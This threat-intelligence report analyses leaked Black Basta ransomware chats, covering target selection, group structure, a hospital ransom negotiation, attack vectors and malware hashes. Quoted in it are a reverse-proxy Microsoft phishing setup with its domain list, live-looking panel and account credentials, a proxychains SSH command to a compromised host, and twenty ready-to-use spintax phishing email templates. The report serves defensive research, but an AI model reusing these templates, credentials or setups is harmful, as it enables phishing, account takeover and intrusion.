Inside BlackBasta: What Leaked Conversations Reveal About Their Ransomware Operations

Executive Summary

Recently, there has been a series of secret chat logs leaked from a group of people that distribute the ransomware known as ‘Black Basta’. The chat logs contain general conversations, insights into their operations and their internal infrastructure. These observations of how a group operates and communicates are rare, and provide insight into their Tactics, Techniques & Procedures (TTPs).

What is BlackBasta ransomware?

Black Basta is a ransomware strain that uses ChaCha20 and XChaCha20 symmetric encryption algorithms to encrypt the files it holds for ransom. Black Basta infections have been seen mostly against Small and Medium-Sized Enterprises (SME), seem to be using public services for victim selection.

Victims of Black Basta ransomware covers a diverse range of industries, including Construction, Law, Transportation, Manufacturing, Electrical, and Financial Services.

Geographically, the most targeted regions include the United States, Germany, the United Kingdom, Canada, Italy, and Switzerland.

Introduction

This comprehensive overview provides valuable insight into the recently leaked conversations, which span from 2023 September into 2024 June. These discussions collectively offer a deeper understanding of the group’s operations, including their tactics, decision-making processes, and strategic shifts over time.

This analysis concentrates solely on the dataset derived from bestflowers.json, which was disclosed by a source known as “ExploitWhispers” through Telegram.

Threat Actor Insights

Current Status of Black Basta Ransomware

Recent indications suggest that Black Basta is currently inactive. The latest information regarding the group reveals a period of inactivity since the beginning of the year, attributed to internal conflicts. For further details.

Figure 1: Black Basta Inactivity

Source of the Leak

The Leak initially popped up on Telegram (= whisper stop) mentioning a https[:]//mega[.]nz link which was promptly taken down.

Figure 2: Dataset Leaks

Figure 3: Black Basta Inactivity

Revenue Based Target Selection

Commercial services such as Revenue Storm and Zoominfo seem to have been heavily used to select targets across different geographies, depending on the dataset available online, direct links describing the potential victims were shared:

revenue_6B_to25M.csv
FOUND_USA_revenue_6B_to_25M.csv
FOUND_Canada_revenue_10B_to_15M.csv
FOUND_USA_revenue_6B_to_25M.csv
FOUND_Canada_revenue_10B_to_15M.csv
revenue_6B_to25M.csv
FOUND_USA_revenue_6B_to_25M.csv
FOUND_Canada_revenue_10B_to_15M.csv

@usernamegg 
I think that 200-300 million earned and 10% is normal

In this regard, our approach is +- the same, I also understand that foot soldiers will never be able to conduct research and give the result that I expect.
That's why now I'm trying to strengthen the team with competent personnel."

Black Basta Organisation

The analysis of the conversations reveals an intriguing observation. The members of Black Basta conduct themselves, as if it were an ordinary day at work, engaging in general discussions about their usual operations.

@usernamegg
Hi
everyone is getting things going
what will be the hashes
did you have work in the summer?
@usernameboy
Okay, no, we were resting
is the capacity OK?

Human Element

Breakdown of the Chat Contributors

The use of various potential chat systems has been noted among the members, who frequently refer to a “new element.”. This term may indicate a shift in the chat system, the formation of a new group chat, or the exploration of an alternative communication platform.

@usergg
Hi, waiting for contacts
Login: pro100boy Password: 4W1VSS!xZVaSGEDg%bgwr1GwTSx3fdvTVtt5vEAR
Mail: pro100boy@electionusa2025[.]shop
I'm leaving here
usergg - look for me by this nickname in the new element (chat?)

The visualization of the 79 threads and 48 contributors reveals collaboration patterns with a dominant central hub and peripheral clusters of connected users.

Figure 4: User Collaboration Network

From a purely volumetric perspective, a small number of users have generated the majority of the content within the groups. The use of username aliases appears to be a consistent trend. Is there a consensus among the most active contributors regarding a fixed alias? Could it be that the same user is behind these aliases?

Message Analytics

Who is the largest contributor to the Black Basta chats?

Based on our observations, the image below presents analytics regarding the most engaged active users. Notably, “usernamegg” stands out as the most active participant, demonstrating the highest level of interaction within the observed chat leaks.

Figure 5: Black Basta Message Analytics

@usernamegg has been observed to be the “head of the operations” taking a big part of the decision making, administrative tasks. Here is an example of @usernamegg creating new accounts and move chats over to new domains:

usernamegg,matrix.bestflowers247.online,Login: pro100boy Password: 4W1V...omitted...vEAR Mail: pro100boy@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: user777 Password: t3gg...omitted...TsvD Mail: user777@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: hunterpass Password: tVgV!...omitted...AXdBa Mail: hunterpass@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,electionusa2025[.]shop 
usernamegg,matrix.bestflowers247.online,Login: ugway Password: Re@@...omitted...qAvV Mail: ugway@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: userlapa Password: CdFR...omitted...tdAC Mail: userlapa@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: burrito Password: !2Qs...omitted...xACW Mail: burrito@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: timber Password: xBd4...omitted...ADe3 Mail: timber@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: chuck Password: qeg2...omitted...@!v25 Mail: chuck@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: cameron Password: B4R%...omitted...X%dDg Mail: cameron@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: cob_crypt_ward Password: SaTB...omitted...tbxVe Mail: cob_crypt_ward@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,Login: han Password: zeeC...omitted...QGad Mail: han@electionusa2025[.]shop
usernamegg,matrix.bestflowers247.online,electionusa2025[.]shop - server name
usernamegg,matrix.bestflowers247.online,Login: znet Password: @@dr...omitted...1wEA Mail: znet@electionusa2025[.]shop

Truly Global Operation

We have put together the geographical locations involved, based on public IP data relating to over 3000 leaked IP addresses, including both compromised infrastructure and victims. This highlights the low-cost of available infrastructure and ease of access/compromise devices that can be utilised to launch attacks, host intermediate infrastructure on, or use for Command and Control.

Figure 5: Black Basta IP locations

Situational Awareness

The group conducted thorough monitoring of their online presence, exchanging messages about themselves a total of 65 times. Black Basta has been diligently tracking reports concerning the group, as well as other entities such as BlackCat, Rhysida, LockBit, Kaseya, and Stormous, and their related articles.

Timeline of users within the chat, the volume of messages and how that is spread over the duration of the chat logs:

Figure 6: News Awareness

LockBit disruption discussion

Black Basta reacts to law enforcement taking down LockBit servers via PHP vulnerabilities.

usernameyy,https: //www.bleepingcomputer.com/news/security/lockbits-seized-site-comes-alive-to-tease-new-police-announcements/
usernameyy,poor guy
usernamegg,we could have the same outcome at any moment
usernamegg,all old chats need to be deleted so that they can't be restored)
usernameyy,thank God our servers with keys are not connected to the admin panel at all
usernameyy,we've done everything correctly
usernamegg,time will tell)
usernameyy,they've taken a harsh approach to ransom
usernameyy,they put a guy from Revil in jail a couple of days ago
usernameyy,13 years old
usernamegg,yes
usernamegg,I saw

Chatter with LockBit Support after FBI report

An intriguing dialogue with Lockbit Support followed the release of a report by the FBI. This conversation highlights concerns surrounding a particular issue related to PHP vulnerable servers utilised by the FBI. The discussion appears to pivot towards Black Basta, suggesting they are working on a solution to address this matter.

2024-02-20 09:42:25
[11:14:26] BB: Hello 
[11:14:33] BB: What's going on?
[11:14:38] BB: How are you there?
[11:14:43] BB: https: //www.bleepingcomputer.com/news/security/lockbit-ransomware-disrupted-by-global-police-operation/
[11:57:27] LockBit: FBI uses vulnerable PHP to hack a couple of servers, servers with data are intact, I'm sitting here recovering
[12:42:00] BB: I ponyl, I'll fix it, everything will be fine ok.

Observed Discussions on Rhysida Ransomware

We have thoroughly examined and analysed various discussions surrounding Rhysida ransomware, drawing insights from multiple sources and reports, including those from Trend Micro and SentinelOne.

These discussions also referenced links to the Rhysida onion leak site, raising questions about its credibility as the “first office blog.” The conversations indicate a proactive approach to monitoring Rhysida’s activities, likely for the purposes of competitive intelligence or to identify operational overlaps.

Negotiation

From the typical ransom.txt:
"- Do not hire a recovery company. They can't decrypt without the key. 
They also don't care about your business. They believe that they are 
good negotiators, but it is not. They usually fail. So speak for yourself."

"Hello ...omitted victim... 
Thank you for joining this private chat. This chat is secure and confidential. It is all TLP: Red and only designated parties from our and your leadership have access to it and the information shared through it.

Typically we will send an introductory message explaining who we are, and what is going on with your systems, and how to resolve it. However, this case, is obviously different, therefore, here are some critical points which we want to discuss upfront.

First, we understand that most likely we are now talking to a Mandiant representative. This means you know who Black Basta is, what our capabilities are, and what our standing is in the ransomware food-chain. We also know who you are and what your cybersecurity scope is. Therefore, we hope to skip all the non-relevant and non-professional rhetoric that we commonly find while negotiating with Americans, and instead talk through essential security and technical points of this incident. 

Second, we hope you realize that while Mandiant is the one curating the investigation, our counterpart here is ...omitted... leadership. We don't necessarily require ...omitted.. CEO in this chat (though, considering that UHG's CEO now needs to answer questions on the Congress carpet, we recommend your CEO to talk to us directly). But we want to make sure that EVERYTHING which is stated here is conveyed to ...omitted... leadership clearly and transparently.

Now, when we covered the negotiation side, we will go straight to the case.
As you yourself know, we had locked over 12000 of your servers and harvested 3 TB of your data. In any other case we would just demand tens of millions of dollars upfront and set a standard negotiation protocol which you are very well aware off. You transfer funds to us, and we give you your data back, a decryption key, a security report, and a guarantee to never target you or your subsidiaries again.
HOWEVER, in this case, the situation is different.

You are a hospital network, moreover, a religious one, and we are not some deplorable garbage like the other groups which were in the news recently, the ones who will do everything to get money. We are human beings and members of an elite cyber syndicate. We have dignity, and as such, the LAST THING WE WANT is for this case to turn into another Change Healthcare, where petty scums disrupted services for three weeks. 

So, please read this VERY CAREFULLY:

We are aware of the current disruptions, from diverted ambulances to cancelled surgery appointments. This wasn't our goal. Our goal was data, which you did not protect and which you will need to pay for. BUT as ripple affects from our actions and because you enacted a quarantine protocol (which feels more like a Hannibal doctrine), the services of hospitals and other healthcare facilities are critically disrupted. And we want to stop this ASAP - before Mother's Day ideally.
Hence, this is our proposal. 

Right now, you perform a medical triage. Think, assess and figure out what you can tell us on what can be done to return the services back to normal. Be reasonable, think carefully. You are a healthcare firm, do a proper triage and chose terms at which we can agree. Your data will remain with us unconditionally until you pay, but we can discuss this later. Right now, put all your effort in coming to an agreeable plan at which we can get to a point that your services are running and your scorched earth doctrine of quarantine is lifted. \n\nThe grim irony of the situation is that it all happened during the Ascension Week. But we have two more Ascension days: today and tomorrow, so lets resolve this first part quick. Tomorrow is Mother's Day. Lets act quick and get the first stage done before then."

Technical Analysis

Through our analysis of the conversations, we have identified several tools that the group employs to support their operations.

Attack Vectors

Based on the dataset observed in the bestflowers.json we have observed the following attack vectors being used by Black Basta during the timeframe of the conversations that were leaked online.

• Phishing Attacks – Performing large-scale phishing campaigns targeting Microsoft services like Office 365 and Azure. The attackers register and configure fraudulent domains, obtain SSL certificates, and use reverse proxies to intercept login credentials and session cookies, bypassing MFA protections.

#### **May 15, 2024 - 19:31:50**
- **UsernameGG:**  
  "[21:45:31] _: There are no TXT records on the domains yet (needed to issue the certificate), I will only be able to finish with them tomorrow morning. I will send the data from the panel now, do not change anything related to the domains. By the way, you need to set up a proxy.  
  [21:46:01] _: Reference for the panel  
  [21:46:12] _: 29:AF:EE:84:8D:C6:FD:86:3F:F0:FA:9A:F1:0E:9B:51:AF:CE:A0:34:E8:81:02:61:E4:B2:E6:66:14:15:0C:C0  
  [21:46:12] _: https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjBzhuxPVDcUeCQ  
  [21:46:15] _: admin_panelp/iePUTTCgKRJANw7;jF35Si53KMC  
  [21:46:23] _: admin_panel  
  [21:46:25] _: EF;p/iePUTTCgKRJANw7;jF35Si53KMC  
  [21:46:31] _: Login credentials  
  [21:46:42] _: The first thing is the sha256 fingerprint of the certificate that needs to be verified  
  [21:46:54] _: Then the link, login, password  
  [21:48:03] _: I’ll be AFK for about 8 hours  
  [21:58:03] **AA:** ++"

#### **May 15, 2024 - 20:30:11**
- **UsernameYY:**  
  "https[:]//jyrl5cskoqv5miqssygjmfnqq7c6s3vrxuo2dehej2jj5vxvw4ukeeid.onion:8081/K4fUPie-pZaLjS9TjBzhuxPVDcUeCQ  
  basic:  
  admin_panel  
  EF;p/iePUTTCgKRJANw7;jF35Si53KMC"

#### **May 16, 2024 - 09:00:25**
- **UsernameGG:**  
  "[Pending - 2024-05-15]  
  [16:51:55] **AA:** Hey  
  [16:51:57] **AA:** ?  
  [16:55:49] _: Hi, I'm here  
  [16:55:58] _: About Microsoft phishing reverse  
  [16:56:29] _: Keep in mind that for it to work, about 25 domains need to be set up  
  [16:56:51] **AA:** Hi  
  [16:56:53] **AA:** Yeah  
  [16:56:56] **AA:** Why so many?  
  [16:57:08] **AA:** Are you intercepting cookies?  
  [16:57:12] **AA:** Will you set everything up?  
  [16:57:21] _: office365.com: // *.res.  
  [16:57:21] _: live.com:  
  [16:57:21] _: s-microsoft.com:  
  [16:57:21] _: microsoftonline.com:  
  [16:57:21] _: microsoft.com: // *.pipe.aria.  
  [16:57:21] _: microsoft365.com:  
  [16:57:21] **AA:** I’ll be doing corporate phishing  
  [16:57:21] _: office.com: // *.delve.  
  [16:57:21] _: office.net: // *.cdn. *.public.cdn.  
  [16:57:21] _: msftauth.net:  
  [16:57:21] _: msauth.net:  
  [16:57:21] _: azure.com:  
  [16:57:21] _: googleapis.com:  
  [16:57:21] _: azureedge.net:  
  [16:57:21] _: akamaized.net:  
  [16:57:21] _: sharepoint.com:  
  [16:57:21] _: 1drv.ms:  
  [16:57:21] _: live.net:  
  [16:57:21] _: msecnd.net:example.com  
  [16:57:21] _: clarity.ms:example.com  
  [16:57:21] _: adnxs.com:example.com  
  [16:57:21] _: 3lift.com:example.com  
  [16:57:21] _: c.bing.com:example.com  
  [16:57:22] _: godaddy.com:  
  [16:57:22] _: adfs:  
  [16:57:22] _: github.com:  
  [16:57:22] _: githubassets.com:  
  [16:57:22] _: okta.com:  
  [16:57:23] _: oktacdn.com:  
  [16:57:28] _: These are the domains that need to be replaced  
  [16:57:32] _: That’s why there are so many  
  [16:57:33] _: The interception is working  
  [16:57:41] _: We need proxies and domains  
  [16:57:45] **AA:** Alright  
  [16:57:47] _: You add the domains yourself, I can help with the rest  
  [16:57:51] **AA:** How much do you charge for setup?  
  [16:58:00] _: Everything is already set up  
  [16:58:07] _: The deployment will be ready in 20 minutes  
  [16:58:15] **AA:** What about domains?  
  [16:58:27] _: You install the domains  
  [16:58:36] **AA:** Where?  
  [16:58:44] _: In the panel, I’ll send the address  
  [16:58:44] **AA:** I have to set up the domains?  
  [16:58:48] _: And the IP where to install as well  
  [16:59:01] _: Do not use newly registered domains or it will be flagged  
  [16:59:05] _: We need dropped domains  
  [16:59:25] **AA:** Do you know anyone selling them?  
  [16:59:30] _: Yes  
  [16:59:37] **AA:** Can you buy them yourself?  
  [16:59:40] **AA:** I’ll send the money  
  [16:59:51] **AA:** I need to test if it works  
  [16:59:51] _: Okay  
  [16:59:55] **AA:** Will this method work?  
  [17:00:10] _: BTC/XMR?  
  [17:00:34] **AA:** If I can intercept their cookies and instantly access Microsoft SSO Security  
  [17:00:39] **AA:** There will be many opportunities  
  [17:00:46] **AA:** BTC  
  [17:00:59] _: bc1q52e6l39xsaxjhz66qpdh8msacrnf5q0a0fn364"

• Credential Stuffing for Remote Access – Brute-force attacks, exploits or utilising leaked, stolen or Exposed login credentials for major enterprise remote access portals, including:
  • VPN and Firewall products including: Citrix, Checkpoint, SonicWall, Pulse Secure, ScreenConnect, GlobalProtect, Juniper Secure Connect, RDP and RDWeb
  • Admin credentials leaked alongside user passwords
  • Active brute-force testing on Citrix portals with confirmed success.
  • Mention of BMT (possibly botnet infrastructure) and IP tracking:
    • 64.176.219[.]106 repeatedly referenced in the conversations

@usernamegg
I have a mail pass 500k database
can you decrypt it?
how long will it take?

<presumably @usernamegg sharing hashes>
photo_2023-10-03 15.37.25.jpeg
photo_2023-10-03 15.37.28.jpeg

@usernameboy
We need to understand what type of hash it is, I'll figure out what it is

There are well over 1000 messages about credential dump / brute-forced password files:

1FORTI_VALID_REVENUE.txt
2FORTI_BRUTED_VALID_REVENUE.txt
ADFS_VALID_idpinitiatedsignon.txt
AUTH_FROM_APOLLO_VALID_20240209.txt
AUTH_FROM_APOLLO_VALID_20240210.txt
AUTH_FROM_APOLLO_VALID_20240211.txt
AUTH_FROM_APOLLO_VALID_20240212.txt
AUTH_FROM_APOLLO_VALID_20240213.txt
AUTH_FROM_APOLLO_VALID_20240214.txt
AUTH_FROM_APOLLO_VALID_20240215.txt
AUTH_FROM_APOLLO_VALID_20240216.txt
AUTH_FROM_APOLLO_VALID_20240217.txt
AUTH_FROM_APOLLO_VALID_20240218.txt
AUTH_FROM_APOLLO_VALID_20240222.txt
AUTH_FROM_APOLLO_VALID_20240223.txt
AUTH_FROM_APOLLO_VALID_20240224.txt
AUTH_FROM_APOLLO_VALID_20240225.txt
AUTH_FROM_APOLLO_VALID_20240226.txt
AUTH_VALID_.txt
AUTH_VALID_20240209.txt
AUTH_VALID_20240211.txt
AUTH_VALID_20240212.txt
AUTH_VALID_20240213.txt
AUTH_VALID_20240214.txt
AUTH_VALID_20240215.txt
AUTH_VALID_20240216.txt
AUTH_VALID_20240222.txt
AUTH_VALID_OWA.txt
CISCO_BRUTED_VALID_IPS.txt    
CISCO_BRUTED_VALID_IPS.txt        
CISCO_BRUTED_VALID_IPS_REVENUE.txt    
CISCO_BRUTED_VALID_ITEMS.txt
CISCO_BRUTED_VALID_ITEMS_REVENUE.txt
CISCO_VALID_ITEMS.txt
CISCO_VALID_ITEMS16.txt
CISCO_VALID_ITEMS_.txt
CW_VALID_AU.txt
CW_VALID_CA.txt
CW_VALID_CH.txt
CW_VALID_DE.txt
CW_VALID_FR.txt
CW_VALID_GB.txt
CW_VALID_HK.txt
CW_VALID_NZ.txt
CW_VALID_US.txt
FORTI_BRUTED_VALID_REVENUE.txt
forti_hkcu.txt
forti_hklm.txt
FORTI_VALID_.txt
FORTI_VALID_FROM_ALL_FILES_REVENUE.txt
FORTI_VALID_FROM_ALL_FILES_REVENUE.txt    
FORTI_VALID_FROM_SPM.txt
FORTI_VALID_REVENUE.txt
PALO_VALID_FILTERED.txt    
SONIC_BRUT_VALID_REVENUE.txt
SONIC_VALID_.txt
SONIC_VALID_ITEMS_REVENUE.txt 
SOPHOS_VALID_.txt
VALID_2kkdomains.txt
VALID_BRUT_CISCO
VALID_BRUT_CISCO16.txt
VALID_BRUT_FORTI.txt
VALID_BRUT_RDWE
VALID_BRUT_RDWEB.txt                  
VALID_BRUT_RDWEB16.txt
VALID_BRUT_RDWEB_.txt
VALID_BRUT_SONIC.txt                  
VALID_BRUT_SONIC16.txt
VALID_BRUT_SONIC_.txt
VALID_PANELS_LIST_FOR_SHELLS.txt        
VALID_corps_randomize.txt
VALID_need.txt 

The group also had discussions regarding payments for hash cracking and password decryption services.

@usernamegg
I found a request where it will be OK for brute force
forti doesn't break the connection there
but authorization encrypted
enc=00b078b248a68a5b95d7a92fb...omitted...32759bf2600000000000000000000000000
this is the request that is sent
and it is hardcoded there lmcintyre:ca...omitted...burger22!

<info>
<api encmethod=0 salt=72..omitted...4 remoteauthtimeout=30 sso_port=8020 f=1cdf />
</info>
there seems to be salt here"

yes, we need to figure out how many iterations, but it will be slow anyway

• Use of Malicious Scripts – Executing scripts (e.g., ‘.vbs’, ‘.msi’) to establish persistence.
• Remote Code Execution (RCE) – Running commands through compromised access.
• Exploiting Cloud & SaaS Services – Obtaining unauthorised access to enterprise services.
• Social Engineering via IT Spoofing – Impersonating IT departments to gain access to sensitive information.
• SOCKS Proxy Usage for Anonymisation – Utilising compromised proxies for stealthy operations.

proxychains ssh root@216[.]146.25.53 = mickiemckittrick[.]net  USA
Password: A5WV...omitted..._Kw5RbYD3E

• Targeting Jenkins – Conducting reconnaissance and information gathering.
• Automated Botnets & Load Balancing – Employing bots for scanning and automating attacks.
• Malicious Attachments – Crafting deceptive messages to circumvent security measures. The aliases @lapa and @usernamegg have been discussing email templates, @usernamegg sharing 20 email templates on 2023-09-25:

Tinker first set - 10 emails for file

Dear Recipient,
I {hope|trust|wish|believe}, this message {finds|reaches|arrives to|meets}, you in {good|excellent|prime|fine}, {health|shape|condition|state}. I've {attached|included|appended|enclosed}, the {requested|desired|asked-for|sought-after}, {file|document|item|material}, for your {review|examination|inspection|evaluation}, with an {embedded|included|incorporated|integrated}, appendix {containing|holding|comprising|including}, {guidelines|instructions|directives|protocols}, that {might|could|may|would}, {interest|engage|intrigue|capture}, you. Please {let|inform|tell|notify}, me {if|should|in case|when}, you have any {questions|inquiries|queries|doubts},.

Greetings.
For your {convenience|ease|benefit|comfort}, the {document|file|material|record}, you've been {waiting|looking|hunting|searching}, for is now {attached|connected|linked|appended}, {along with|together with|coupled with|accompanied by}, {included|incorporated|embedded|inserted}, accompanying {details|info|data|specifics}, {guidelines|rules|protocols|regulations}, and an appendix that {may|might|could|can}, offer {further|added|more|additional}, {insights|perspectives|views|information},.

Hello, 
I {trust|believe|hope|assume}, this email {reaches|arrives to|gets to|happens upon}, you {promptly|quickly|speedily|swiftly}. The {primary|main|chief|foremost}, {file|document|material|record}, has been {attached|linked|added|affixed}, {alongside|beside|next to|with}, our {latest|most recent|newest|current}, appendix on {protocol|procedure|guideline|policy}, {updates|changes|modifications|alterations}. Your {timely|prompt|swift|speedy}, {review|inspection|examination|evaluation}, and {insights|feedbacks|responses|observations}, are {appreciated|valued|esteemed|treasured},.

Good day!
{Acknowledging|Recognizing|Noting|Observing}, your {request|inquiry|demand|query}, from our {recent|latest|previous|past}, {correspondence|communication|interaction|dialogue}, I've {attached|included|enclosed|appended}, the {necessary|required|needed|essential}, {documents|files|materials|records}, {dossiers|reports|papers|documents}, {files|documents|materials|data}, and appendix. {Note|Bear in mind|Please consider|Do realize}, that {should|if|in case|when}, you {require|need|demand|seek}, {further|additional|more|extra}, {clarity|clearness|transparency|insight}, the {added|included|appended|new}, {sections|parts|segments|divisions}, of the {documents|files|materials|papers}, have been {updated|revised|refreshed|modified}, with {additional|extra|more|supplementary}, {guidelines|instructions|protocols|rules},.

Good day.
In {line|accordance|alignment|conjunction}, with our {previous|prior|earlier|last}, {discussion|conversation|talk|chat}, the {attached|enclosed|appended|linked}, {file|document|material|record}, {contains|holds|incorporates|includes}, the {details|information|specifics|data}, {information|data|insights|knowledge}, {guidelines|protocols|instructions|rules}, and an appendix {requested|asked for|demanded|sought}. We've {also|additionally|moreover|furthermore}, {updated|modified|changed|revised}, our {internal|in-house|inside|domestic}, {protocol|procedure|system|method}, to {reflect|show|indicate|demonstrate}, {recent|latest|new|current}, {changes|alterations|modifications|shifts},.

Hello, Sir/Madam.
Our {team|group|crew|unit}, has {prepared|readied|set up|arranged}, and {attached|affixed|linked|added}, the {file|document|material|data}, per your {specifications|requirements|standards|guidelines}. For a {broader|wider|more extensive|expanded}, {understanding|grasp|comprehension|knowledge}, {consult|refer to|look at|examine}, the {complementary|additional|supplementary|accompanying}, appendix  {module|unit|section|component}, we've {added|included|inserted|embedded}. {Looking|Hoping|Wishing|Waiting}, {forward|ahead|onward|toward}, to your {feedback|response|reply|reaction},.

Dear Colleague,
Please {find|locate|see|identify}, {attached|enclosed|affixed|appended}, the {documents|papers|files|materials}, in {accordance|alignment|conformity|agreement}, with our {agreement|contract|pact|arrangement}. I've {also|additionally|furthermore|moreover}, {integrated|combined|merged|blended}, a {brief|short|concise|quick}, appendix {outlining|describing|detailing|defining}, our {procedural|methodical|routine|systematic}, {norms|standards|rules|principles}. It {might|may|could|should}, {assist|help|aid|support}, in {streamlining|simplifying|organizing|improving}, the {review|evaluation|assessment|inspection},.

Greetings.
In our {continued|ongoing|persistent|sustained}, {effort|endeavor|attempt|drive}, to {serve|assist|help|support}, you {efficiently|effectively|productively|capably}, the {necessary|required|essential|needed}, {files|documents|materials|records}, have been {attached|linked|appended|affixed}, to this email. The {modular|sectional|component-based|segmental}, appendix should {provide|offer|give|supply}, an {overview|outline|summary|snapshot}, of the {recent|latest|new|current}, {framework|structure|system|scaffold}, {adjustments|modifications|changes|shifts},.

Hello,
{Thank|Appreciate|Gratitude|Acknowledgment}, you for your {patience|tolerance|forbearance|endurance}. {Enclosed|Contained|Within|Inside}, you'll {find|locate|discover|uncover}, the {file|document|material|record}, you {requested|asked for|sought|demanded}. {Additionally|Moreover|Furthermore|Plus}, the appendix {within|inside|contained|incorporated}, {offers|provides|presents|gives}, a {concise|brief|succinct|clear}, {breakdown|summary|overview|analysis}, of {key|important|vital|crucial}, {points|items|issues|topics}. This will {expedite|hasten|speed up|accelerate}, your {review|evaluation|assessment|inspection}, {process|method|system|approach},.

Dear Sir/Madam,
Your {requested|desired|asked-for|sought}, {documents|papers|files|materials}, are now {ready|set|prepared|good}, for {review|evaluation|inspection|assessment}, in the {attached|enclosed|linked|appended}, {file|document|record|item}. To {assist|help|support|guide}, in your {assessment|evaluation|review|judgment}, we've {included|added|incorporated|embedded}, a {specific|particular|unique|certain}, {module|unit|section|component}, & appendix on {certain|specific|particular|some}, {sections|parts|segments|divisions}. Your {thoughts|ideas|opinions|views}, and {feedback|response|comment|reaction}, will be {much|highly|greatly|very}, {awaited|anticipated|expected|looked for},.

"Second set - 10 emails for link - I had to test here to keep the dialog format"

Hey,
{Hope|Trust|Believe|Wish}, you're {doing|feeling|going|being}, well. I've {dropped|left|placed|set}, the link {here|below|for you|in this email}, for you; it is a {good|solid|proper|useful}, gateway to some {other|additional|more|extra}, resources we {talked|spoke|chatted|conversed}, about. {Let|Please|Do|Kindly}, me know what you {think|believe|feel|consider},.

Hi,
{Hope|Trust|Believe|Wish}, you're well. I've {attached|linked|added|included}, the link you {requested|asked for|wanted|sought}. {Additionally|Moreover|Furthermore|Also}, this link {serves|acts|functions|works}, as a gateway to some of the resources we {discussed|talked about|went over|mentioned}, during our {last|previous|recent|prior}, meeting. {Do|Please|Kindly|Would you}, give it a look.

Hello,
{Just|Simply|Only|Merely}, wanted to {shoot|send|forward|give}, you the link. {Also|Moreover|Furthermore|Plus}, it {doubles|serves|acts|stands}, as a gateway to some of our {new|recent|latest|updated}, updates. {Check|Look|Review|Go through}, it out when you can.

Hey there,
{Remember|Recall|Recollect|Think about}, that link you {asked|inquired|questioned|wondered}, about? {Here|Here it is|This is it|Presenting}, it is. Plus, it's the gateway to some {recent|latest|new|current}, stuff we've been {working|toiling|laboring|grinding}, on. {Dive|Jump|Delve|Plunge}, in, and let's {catch up|meet|reconnect|gather}, soon.

Hi,
I've {secured|obtained|got|acquired}, the link you were {inquiring|asking|querying|wondering}, about {earlier|before|previously|lately}. It {also|furthermore|additionally|moreover}, acts as a gateway to several {insights|perspectives|views|observations}, from our {recent|latest|last|new}, team {discussions|talks|conversations|meetings}. Your {feedback|input|response|comment}, would be {valuable|important|precious|invaluable},.

Hey,
{Here's|Here is|This is|Presenting}, that link. {Thought|Felt|Believed|Considered}, you'd {like|love|want|prefer}, to know it's {also|as well|too|furthermore}, a gateway to a {bunch|lot|group|set}, of tools I {stumbled|came|ran|bumped}, upon {recently|lately|of late|in recent times}. {Might|May|Could|Should}, be {handy|useful|helpful|convenient}, for your project.

Hello,
I am {ensuring|making sure|guaranteeing|assuring}, you {received|got|obtained|acquired}, the gateway link in a {timely|prompt|swift|speedy}, manner. {Please|Kindly|Do|Would you}, review when you have a {moment|minute|bit|second},.

Hey,
As {promised|stated|said|told}, {here's|here is|this is|I'm sending}, the link. And... it's your gateway to {understanding|grasping|comprehending|getting}, our {latest|most recent|newest|up-to-date}, brainstorm. {Curious|Eager|Keen|Anxious}, to {hear|listen to|get|receive}, your {take|opinion|view|perspective}, on it.

Hello,
{Here's|Here is|This is|Presenting}, the link. {Beyond|Apart from|Outside of|Besides}, the main {stuff|content|material|things}, it's a gateway into some {fun|exciting|interesting|cool}, experiments we've been {doing|making|performing|executing}. {Enjoy|Relish|Savor|Like}!

Hi,
{Here's|Here is|This is|Presenting}, the link you {mentioned|talked about|spoke of|referred to}, the {other|previous|past|recent}, day. It's {not|not just|not only|not merely}, data; it's a gateway to the {collaborative|cooperative|joint|combined}, {efforts|works|attempts|endeavors}, of our team. I'd {appreciate|value|like|cherish}, your {insights|thoughts|opinions|views}, {once|when|after|as soon as}, you've {had|got|taken|made}, a chance to {explore|look into|delve into|probe},.

Good day,
I've {provided|given|offered|supplied}, the link as {requested|asked for|wanted|demanded}. {Beyond|Outside|Apart from|Besides}, the {primary|main|chief|principal}, content, it's a gateway into some of the {methodologies|methods|approaches|techniques}, we're {exploring|investigating|looking into|studying}. {Eager|Keen|Excited|Anxious}, to {discuss|talk about|converse on|speak about}, your {takeaways|insights|findings|results},.

Malware shared

Discussions have highlighted the presence of potential malicious file samples. It appears that members were verifying the samples they had uploaded or checking for any that had been reported. Additionally, a new collection has been added to VirusTotal.

https://www.virustotal.com/gui/file/67fd74add9de8de8b4006ee023cd9afe78c913cfac176bf9664de8a90fc1ac4f/detection
https://www.virustotal.com/gui/file/63b3d18919359d1e4d0bd8b325d71bd3d72d6d0c10e84659b188a53a4948792e/detection
https://www.virustotal.com/gui/file/c7102c6da4d36183cc79150e98dd8838aeef9f3cd255dfd8269934e5d80932d5/detection
https://www.virustotal.com/gui/file/69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320/detection
https://bazaar.abuse.ch/sample/21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7/
https://bazaar.abuse.ch/sample/4525336edf9ecc516f36cdd379b6f31acdbd668b42ce6a6158344762e5aa0dee/
https://bazaar.abuse.ch/sample/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242/
https://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/
https://bazaar.abuse.ch/sample/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac/
https://bazaar.abuse.ch/sample/74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5/
https://bazaar.abuse.ch/sample/693ff5db0a085db5094bb96cd4c0ce1d1d3fdc2fbf6b92c32836f3e61a089e7a/
https://bazaar.abuse.ch/sample/ce616c5d472d8d22169e1cabd8c99a511394b1c28febc944f427137a0354e8db/
